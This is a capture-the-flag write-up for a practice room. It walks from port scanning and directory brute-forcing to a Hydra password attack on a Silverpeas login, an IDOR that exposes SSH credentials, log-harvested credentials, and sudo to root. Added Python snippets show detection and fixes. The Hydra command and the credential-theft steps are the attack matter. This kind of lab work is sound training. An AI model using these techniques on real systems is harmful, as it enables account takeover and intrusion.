Silver Platter

Can you breach the server?

Recon

We start with an Nmap scan and find three open ports: SSH on port 22, an nginx web server on port 80, and another web server on port 8080.

┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV -sT -p 22,80,8080 silverplatter.thm -T4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-17 12:26 IST
Nmap scan report for silverplatter.thm (10.10.232.52)
Host is up (0.15s latency).

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 1b:1c:87:8a:fe:34:16:c9:f7:82:37:2b:10:8f:8b:f1 (ECDSA)
|_  256 26:6d:17:ed:83:9e:4f:2d:f6:cd:53:17:c8:80:3d:09 (ED25519)
80/tcp   open  http       nginx 1.18.0 (Ubuntu)
|_http-title: Hack Smarter Security
|_http-server-header: nginx/1.18.0 (Ubuntu)
8080/tcp open  http-proxy
|_http-title: Error
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 Not Found
|     Connection: close
|     Content-Length: 74
|     Content-Type: text/html
|     Date: Mon, 17 Feb 2025 06:56:38 GMT
|     <html><head><title>Error</title></head><body>404 - Not Found</body></html>
|   GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SMBProgNeg, SSLSessionReq, Socks5, TLSSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 Bad Request
|     Content-Length: 0
|     Connection: close
|   GetRequest, HTTPOptions: 
|     HTTP/1.1 404 Not Found
|     Connection: close
|     Content-Length: 74
|     Content-Type: text/html
|     Date: Mon, 17 Feb 2025 06:56:37 GMT
|_    <html><head><title>Error</title></head><body>404 - Not Found</body></html>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.94SVN%I=7%D=2/17%Time=67B2DDA4%P=x86_64-pc-linux-gnu%r
SF:(GetRequest,C9,"HTTP/1\.1\x20404\x20Not\x20Found\r\nConnection:\x20clos
.............
SF:n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 91.34 seconds

Enumerating directories with Feroxbuster on the web server running on port 80 does not turn up any notable or useful results.

┌──(kali㉿kali)-[~]
└─$ feroxbuster -u 'http://silverplatter.thm/' -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt 
                                                                                                                                                                                                                                           
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.3
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://silverplatter.thm/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.3
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        7l       12w      162c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        7l       12w      178c http://silverplatter.thm/images => http://silverplatter.thm/images/
200      GET      137l      408w    15151c http://silverplatter.thm/images/pic03.jpg
200      GET        2l       52w     2051c http://silverplatter.thm/assets/js/browser.min.js
200      GET      587l     1232w    12433c http://silverplatter.thm/assets/js/util.js
200      GET      401l      738w     8435c http://silverplatter.thm/assets/js/main.js
200      GET        2l       87w     2439c http://silverplatter.thm/assets/js/breakpoints.min.js
200      GET       37l       80w      572c http://silverplatter.thm/assets/css/noscript.css
200      GET     1657l     3577w    34353c http://silverplatter.thm/assets/css/main.css
200      GET        2l     1294w    89501c http://silverplatter.thm/assets/js/jquery.min.js
403      GET        7l       10w      162c http://silverplatter.thm/assets/
403      GET        7l       10w      162c http://silverplatter.thm/assets/js/
403      GET        7l       10w      162c http://silverplatter.thm/assets/css/
301      GET        7l       12w      178c http://silverplatter.thm/assets => http://silverplatter.thm/assets/
200      GET     3507l    19364w  1579223c http://silverplatter.thm/images/pic02.jpg
200      GET     8018l    46906w  3648400c http://silverplatter.thm/images/pic01.jpg
200      GET      345l     1180w    14124c http://silverplatter.thm/
301      GET        7l       12w      178c http://silverplatter.thm/assets/css => http://silverplatter.thm/assets/css/
301      GET        7l       12w      178c http://silverplatter.thm/assets/js => http://silverplatter.thm/assets/js/
[###>----------------] - 2m    185329/1038159 8m      found:18      errors:0      
301      GET        7l       12w      178c http://silverplatter.thm/assets/sass => http://silverplatter.thm/assets/sass/
301      GET        7l       12w      178c http://silverplatter.thm/assets/sass/layout => http://silverplatter.thm/assets/sass/layout/
301      GET        7l       12w      178c http://silverplatter.thm/assets/sass/components => http://silverplatter.thm/assets/sass/components/
301      GET        7l       12w      178c http://silverplatter.thm/assets/sass/base => http://silverplatter.thm/assets/sass/base/
301      GET        7l       12w      178c http://silverplatter.thm/assets/sass/libs => http://silverplatter.thm/assets/sass/libs/
[##################>-] - 14m  1902644/2076304 0s      found:23      errors:3      
🚨 Caught ctrl+c 🚨 saving scan state to ferox-http_silverplatter_thm_-1739777048.state ...
[##################>-] - 14m  1902688/2076304 0s      found:23      errors:3      
[####################] - 12m   207629/207629  293/s   http://silverplatter.thm/ 

On the web server running on port 8080, we discover two directories: /website and /console. Both seem intriguing, but /console redirects to a static noredirect.html page, and /website redirects to /website/, which is restricted with a "Forbidden" error.

┌──(kali㉿kali)-[~]
└─$ feroxbuster -u 'http://silverplatter.thm:8080/' -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt 
                                                                                                                                                                                                                                           
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.3
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://silverplatter.thm:8080/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.3
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        1l        4w       74c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
302      GET        0l        0w        0c http://silverplatter.thm:8080/website => http://silverplatter.thm:8080/website/
404      GET        1l        2w       68c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
302      GET        0l        0w        0c http://silverplatter.thm:8080/console => http://silverplatter.thm:8080/noredirect.html
[####################] - 12m   415258/415258  0s      found:2       errors:0      
[####################] - 12m   207629/207629  297/s   http://silverplatter.thm:8080/ 
[####################] - 12m   207629/207629  297/s   http://silverplatter.thm:8080/website/  

We look at the page manually on port 80.

Under the Contact section, we identify a potential user listed as the project manager for Silverpeas.

On the website on port 8080 we find nothing on the index page and /website redirects us to /website/, which is forbidden.

Multiple 403 bypass techniques and automated scripts proved ineffective. Given the username and a hint of potential brute-forcing in the room description, we attempted basic authentication brute-forcing using Hydra, but this also failed.

Initial Access

However, the contact form reference to Silverpeas proves useful. Entering it as a directory at http://silverplatter.thm:8080/ results in a hit—a Silverpeas login page. While there are known CVEs for Silverpeas, they are not required for this challenge.

http://silverplatter.thm:8080/silverpeas

Now we capture a login request to craft our Hydra command.

We forward the intercepted login request to capture the server's invalid response message, which can help us identify any clues or patterns to fine-tune our brute-force attack.

hydra -l scr1ptkiddy -P passwords.txt silverplatter.thm -s 8080 http-post-form "/silverpeas/AuthenticationServlet:Login=^USER^&Password=^PASS^&DomainId=0:F=Login or password incorrect"

We are able to log in as scr1ptkiddy at Silverpeas.
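
A way to spot the kind of password guessing run against the Silverpeas login above, as an added example that is not part of the original write-up: it counts POSTs to the login endpoint per client in a sliding window. The combined access-log format, the threshold, the client addresses and the sample log lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

LOGIN_PATH = "/silverpeas/AuthenticationServlet"  # login endpoint from the write-up
# Assumption: combined-format access log, e.g. from a reverse proxy in front of Silverpeas.
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)')
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"


def find_bruteforce(lines, max_posts=5, window=timedelta(seconds=60)):
    """Return {client_ip: peak login POSTs seen in one window} for clients over max_posts.

    Lines must be in time order. The failure message is part of the response,
    which access logs do not record, so every login POST is counted.
    """
    recent = defaultdict(deque)  # ip -> timestamps still inside the window
    peaks = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST" or m["path"].split("?")[0] != LOGIN_PATH:
            continue
        ts = datetime.strptime(m["ts"], TS_FORMAT)
        seen = recent[m["ip"]]
        seen.append(ts)
        while ts - seen[0] > window:
            seen.popleft()
        if len(seen) > max_posts:
            peaks[m["ip"]] = max(peaks.get(m["ip"], 0), len(seen))
    return peaks


def sample_log():
    """Constructed sample: one client guessing 4 times per second, one normal login."""
    start = datetime(2025, 2, 17, 7, 0, 0, tzinfo=timezone.utc)
    lines = []
    for i in range(40):
        ts = (start + timedelta(milliseconds=250 * i)).strftime(TS_FORMAT)
        lines.append(f'192.0.2.10 - - [{ts}] "POST {LOGIN_PATH} HTTP/1.1" 302 0')
    ts = (start + timedelta(seconds=10)).strftime(TS_FORMAT)
    lines.append(f'198.51.100.7 - - [{ts}] "GET /silverpeas/ HTTP/1.1" 200 5120')
    lines.append(f'198.51.100.7 - - [{ts}] "POST {LOGIN_PATH} HTTP/1.1" 302 0')
    return lines


if __name__ == "__main__":
    for ip, count in find_bruteforce(sample_log()).items():
        print(f"{ip}: {count} login POSTs within 60 s")
```

The same counter can drive a lockout or rate limit on the login endpoint instead of only reporting.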

After logging in as scr1ptkiddy, we notice a single notification displayed on the dashboard.

In the personal workspace, we can inspect our notifications.

Shell as Tim

We intercept the request that opens the message and see that it queries an ID, here ID 5.

Upon discovering an IDOR (Insecure Direct Object Reference), we exploit it to inspect the messages of other users. In particular, we find that the message with ID 6 contains the SSH credentials for the user tim.
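
The missing check behind this IDOR, modelled in Python as an added example (not Silverpeas code and not from the original write-up): the vulnerable reader looks a message up by ID alone, while the hardened one also compares the recipient with the session user and counts denied attempts. The function names, the `other-user` recipient and the message bodies are hypothetical placeholders; only IDs 5 and 6 mirror the write-up.

```python
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class Message:
    id: int
    recipient: str
    body: str


# Constructed data: IDs 5 and 6 mirror the write-up, everything else is a placeholder.
MESSAGES = {
    5: Message(5, "scr1ptkiddy", "<notification for scr1ptkiddy>"),
    6: Message(6, "other-user", "<message meant for another user>"),
}
DENIED = Counter()  # session user -> number of foreign-message requests (detection signal)


class NotFound(Exception):
    """Raised for missing and foreign messages alike, so IDs cannot be probed."""


def read_message_vulnerable(session_user: str, msg_id: int) -> str:
    # The flaw: any authenticated session can fetch any ID; the recipient is never compared.
    msg = MESSAGES.get(msg_id)
    if msg is None:
        raise NotFound(msg_id)
    return msg.body


def read_message_hardened(session_user: str, msg_id: int) -> str:
    # Object-level authorization: the message must exist AND belong to the session user.
    msg = MESSAGES.get(msg_id)
    if msg is None:
        raise NotFound(msg_id)
    if msg.recipient != session_user:
        DENIED[session_user] += 1  # worth alerting on when it climbs for one account
        raise NotFound(msg_id)     # same error as a missing ID, no existence oracle
    return msg.body


if __name__ == "__main__":
    print(read_message_vulnerable("scr1ptkiddy", 6))  # foreign message is returned
    try:
        read_message_hardened("scr1ptkiddy", 6)
    except NotFound:
        print("hardened: not found; denied count =", DENIED["scr1ptkiddy"])
```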

Next, we use those credentials to log in via SSH.

We find the user flag in the home directory of the user tim.

Privilege Escalation

By examining Tim's group memberships, we find that he is part of the adm group, which grants him access to view the logs located in /var/log. These logs could contain sensitive information that might help us escalate privileges further.

There is also the user tyler.

Shell as Tyler

So let's search the logs for entries mentioning the user tyler.

And we do find some database credentials. Maybe they are reused.

We successfully switched to the user tyler using those credentials.
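
A check for the weakness used in this step, credentials sitting in logs that the adm group can read, as an added example that is not part of the original write-up: it scans log lines for password-style assignments and reports them with the value redacted. The keyword list, the user `deploy` and the sample lines are assumptions constructed for illustration.

```python
import re

# One pattern, two shapes: NAME_PASSWORD=value (env/config style) and --password value.
# The keyword list is an assumption; extend it for the software you run.
SECRET_RE = re.compile(r"(?i)(--password[ =]|\b\w*(?:password|passwd|secret)\w*=)(\S+)")

# Constructed sample lines (not taken from the target host).
SAMPLE = [
    "Feb 17 07:00:01 host sshd[812]: Failed password for invalid user admin "
    "from 192.0.2.10 port 50222 ssh2",
    "Feb 17 07:02:13 host sudo: deploy : TTY=pts/0 ; PWD=/opt/app ; USER=root ; "
    "COMMAND=/usr/bin/docker run -e DB_PASSWORD=example-not-real -d app-db",
    "Feb 17 07:05:40 host app[1201]: connecting with --password example-not-real2 to db",
]


def scan_lines(lines):
    """Return (line_number, key, redacted_line) per secret found; values are never echoed."""
    findings = []
    for number, line in enumerate(lines, start=1):
        for match in SECRET_RE.finditer(line):
            redacted = SECRET_RE.sub(lambda m: m.group(1) + "[REDACTED]", line)
            findings.append((number, match.group(1).rstrip("= "), redacted))
    return findings


if __name__ == "__main__":
    for number, key, redacted in scan_lines(SAMPLE):
        print(f"line {number}: {key}\n    {redacted}")
```

Any hit means the secret should be rotated and the process changed so the value is no longer passed on a logged command line.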

The user is granted permission to run any command as root without a password. We use sudo su to switch to root, navigate to the root directory, and find the final flag.
